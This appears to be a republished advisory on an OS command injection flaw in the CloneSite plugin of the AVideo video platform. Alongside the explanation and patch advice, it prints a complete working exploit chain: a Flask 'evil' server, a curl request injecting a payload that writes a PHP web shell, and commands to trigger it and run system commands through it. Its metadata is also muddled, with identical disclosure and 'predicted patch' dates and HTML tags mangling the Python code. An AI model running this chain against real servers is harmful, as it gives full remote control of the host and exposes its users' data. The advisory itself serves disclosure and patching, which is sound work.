Listen to this Post
The vulnerability arises from improper sanitization of the `cloneSiteURL` parameter in the `cloneClient.json.php` endpoint of the CloneSite plugin. At line 112, the code attempts to sanitize input using str_replace("'", '', escapeshellarg($objClone->cloneSiteURL)), which inadvertently removes the single quotes added by escapeshellarg, breaking the intended shell context. This unsanitized value is then concatenated into a `wget` command at line 117 ($cmd = "wget -O {$sqlFile} {$sqlURL}") and executed via `exec()` at line 119. An attacker can inject arbitrary shell commands by including shell metacharacters like `;` in the cloneSiteURL. The attack flow involves setting up a malicious server to provide crafted JSON data, adding the malicious URL via `objects/pluginAddDataObject.json.php` (requiring admin privileges), and then triggering the vulnerable endpoint `plugin/CloneSite/cloneClient.json.php` to execute the injected command. The provided proof-of-concept demonstrates writing a PHP web shell to the server.
DailyCVE form:
Platform: AVideo
Version: 12.3 prior
Vulnerability :OS Command Injection
Severity: High
date: 2023-04-28
Prediction: Patch by 2023-04-28
Analytics under heading What Undercode Say:
Python malicious server (evil site)
from flask import Flask, jsonify
app = Flask(<strong>name</strong>)
@app.route('/')
def index():
return jsonify({"error": False, "msg": "", "url": "http://target-site.com/", "key": "target_clone_key", "useRsync": 0, "videosDir": "/var/www/html/AVideo/videos/", "sqlFile": "Clone_mysqlDump_evil123.sql", "videoFiles": [], "photoFiles": []})
if <strong>name</strong> == '<strong>main</strong>':
app.run(host='0.0.0.0', port=8071)
Inject malicious URL (requires admin session)
curl -b 'PHPSESSID=<admin_session>' -X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" -H "Content-Type: application/json" -d '{"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[bash])?>\"${IFS}>1.php;/","cloneSiteSSHIP":"127.0.0.1","cloneSiteSSHUser":"1","cloneSiteSSHPort":"22","cloneSiteSSHPassword":{"type":"encrypted","value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="},"useRsync":true,"MaintenanceMode":false,"myKey":"ba882541262f3202ee5a5ad790ae5b70"}'
Trigger RCE to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php"
Execute commands via web shell
curl "http://127.0.0.1/plugin/CloneSite/1.php" -d '1=id'
Exploit:
The attacker first sets up a malicious server that returns a crafted JSON response. Using a valid admin session, the attacker sends a POST request to `pluginAddDataObject.json.php` with the `cloneSiteURL` containing the injected payload (;echo${IFS}"<?=system(\\$_POST[bash])?>"${IFS}>1.php;/). When `cloneClient.json.php` is accessed, the unsanitized URL is used in the `wget` command, causing the injected commands to be executed. The example payload writes a PHP web shell (1.php) to the server, allowing arbitrary command execution.
Protection from this CVE
Upgrade to AVideo version 12.4 or later, which includes a proper patch. If patching is not immediately possible, implement strict input validation for the `cloneSiteURL` parameter, ensuring only allowed characters (e.g., alphanumeric, dots, and hyphens) are accepted. Avoid using `exec()` with user-controlled input; use safer alternatives like parameterized APIs or built-in PHP functions for file operations.
Impact
Remote Code Execution (RCE) allowing arbitrary system commands. An attacker can write a web shell, leading to full server compromise. This includes reading/modifying the database, accessing all user data, pivoting to internal services, and potentially escalating privileges on the host.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

